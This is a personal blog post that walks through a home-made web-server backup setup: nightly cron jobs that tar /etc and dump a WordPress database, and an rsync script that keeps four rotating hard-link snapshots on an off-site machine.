For my first post I’m going to document the backup solution I use on my web server.
The backups happen in two parts:
Step 1 – Make Dumps of Important Data
First, I create backup files of important data on my webserver in a specific place. In my case those files are:
- A tarball of the /etc/ directory, with essentially ALL of the configuration data for my system.
- Dumps of any databases that I have on the system.
These files are generated by two scripts which are run every night by cron.
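After a night's run, the local backup directory contains something along these lines (a sketch; the date stamp follows the format used in the mytar script below, and the database name comes from my WordPress dump script):

~/backup/local/etc.YYYYMMDD.tar.bz2
~/backup/local/alexrichards.dump.sql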
The mytar Script
#!/bin/bash
# usage: mytar <directory>
# makes a dated tarball of the given directory in $DEST
DATE=`date +%Y%m%d`
DEST="/home/oneill/backup/local"
dir=`basename $1`
tar -jcf $DEST/$dir.$DATE.tar.bz2 $1
chown oneill:oneill $DEST/$dir.$DATE.tar.bz2
Pretty simple. I call it from cron using the following crontab entry:
47 0 * * * sudo /home/oneill/local/bin/mytar /etc > /dev/null
That means: at 00:47 every day, run this job. I ignore standard output, but any errors (output to stderr) will be caught by cron and emailed to me. I chose the minute somewhat at random: the server is a VPS shared with other users, and picking a random time makes it unlikely that my jobs run at the same moment as theirs.
The backup_wordpress Script
#!/bin/sh
DBNAME="alexrichards"
DBUSER="*****"
DBPASS="*****"
DEST="$HOME/backup/local/$DBNAME.dump.sql"
CMD="mysqldump -e --create-options -u $DBUSER \
--password=$DBPASS $DBNAME"
$CMD > $DEST
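The database dump is scheduled by cron in the same way as mytar; a sketch of the crontab entry, with the minute and the install path assumed here:

53 0 * * * /home/oneill/local/bin/backup_wordpress > /dev/null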
Both scripts put their output in ~/backup/local/, which is then backed up to a completely different computer.
Step 2 – Off-site Backup
I use rsync to make incremental off-site backups onto a computer located under my desk at work.
The backups are rotated, with 4 older copies being kept. This helps me not to panic if, for example, I delete a critical file but don’t notice until AFTER the backup has happened (and the critical file is therefore not present in the most recent backup).
To do this rotation, I use a hard-link method in order to save time and disk space.
Here’s the script I use: mybackup
#!/bin/bash
# usage: mybackup
# config file: ~/.mybackup
# format: One directory per line, with
# optional rsync destination after
DIRFILE=$HOME/.mybackup
DEFAULT_DEST="/data/backup"
RSYNC_CMD="rsync -a --rsh=ssh --delete --progress"
NUM_SNAPSHOTS=4
if ! [ -f $DIRFILE ]; then
echo "Backup config file $DIRFILE not found"
exit 1
fi
cat $DIRFILE |while read line; do
# skip blank lines
if [ "$line" == "" ]; then
continue
fi
# skip commented lines ('#')
if [ `expr match "$line" '#'` -gt 0 ]; then
continue
fi
src=`echo $line | awk '{print $1}'`
dir=`basename $src | awk -F ':' '{print $(NF)}' \
| awk -F '/' '{print $NF}'`
dest=`echo $line | awk '{print $2}'`
if [ "$dest" == "" ]; then
dest=$DEFAULT_DEST
fi
host=`echo $src | awk -F ':' '{print $1}'`
host=`echo $host |awk -F '@' '{print $NF}'`
dest="$dest/$host"
mkdir -p "$dest"
# shuffle the existing backups
if [ -e $dest/$dir.$NUM_SNAPSHOTS ]; then
echo "deleteing oldest backup \
$dir.$NUM_SNAPSHOTS"
rm -rf $dest/$dir.$NUM_SNAPSHOTS
fi
for j in `seq $NUM_SNAPSHOTS -1 1`; do
i=`echo $j - 1 | bc`
if [ -e "$dest/$dir.$i" ]; then
echo "Found old backup \
$dir.$i, moving to $dir.$j"
mv "$dest/$dir.$i" "$dest/$dir.$j"
fi
done
echo "Backing up dir: $src to $dest/$dir.0"
CMD="$RSYNC_CMD --link-dest=../$dir.1 $src \
$dest/$dir.0/"
echo $CMD
$CMD
done
mybackup reads the file ~/.mybackup to get a list of locations to back up. In my case, this file looks like this:
potatoriot.com:mail/ /home/oneill/backup/
potatoriot.com:html/ /home/oneill/backup/
potatoriot.com:backup/local/ /home/oneill/backup/
This creates directories like /home/oneill/backup/potatoriot.com/html.0 through /home/oneill/backup/potatoriot.com/html.4.
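On the backup machine, the full tree ends up looking roughly like this (a sketch; each source's last path component becomes the snapshot name):

/home/oneill/backup/potatoriot.com/
    mail.0/  mail.1/  mail.2/  mail.3/  mail.4/
    html.0/  html.1/  html.2/  html.3/  html.4/
    local.0/ local.1/ local.2/ local.3/ local.4/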
Explanation
First, for each directory to be backed up, the oldest backup is deleted, and the others are shuffled along in the backup order (html.3 becomes html.4, and so on).
Next, a fresh copy of the source is produced using rsync with the --link-dest argument, which creates hard links to the files in html.1 where possible.
CMD="$RSYNC_CMD --link-dest=../$dir.1 $src $dest/$dir.0/"
This hard-link strategy means that any file that exists and is identical in html.1 is not copied into the new directory; it is hard-linked instead, so it takes up no extra space. Nor is it copied over the network, thanks to the magic of rsync. Even if a file has changed, rsync uses the copy in html.1 as a basis, so only the changes are sent over the network.
This strategy makes backing up extremely efficient. The backup uses approximately the same amount of space as the original files do, even though I have 4 older revisions available should anything have changed.
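A quick way to convince yourself that the hard links are doing their job (a sketch; the paths and the index.php filename are just examples):

# unchanged files share an inode between snapshots, i.e. one copy on disk
ls -li /home/oneill/backup/potatoriot.com/html.0/index.php \
       /home/oneill/backup/potatoriot.com/html.1/index.php

# du counts each hard-linked file only once, so the total stays close to
# the size of a single snapshot
du -sh /home/oneill/backup/potatoriot.com/html.*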
I run mybackup every night via a cron job. I chose the time to be at least an hour after the cronjob on the webserver, so that I get the latest database dumps in the backup.
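For completeness, the crontab entry on the work machine looks something like this (the time is arbitrary, as long as it comfortably trails the webserver's jobs; adjust the path to wherever the script lives):

7 2 * * * /home/oneill/local/bin/mybackup > /dev/null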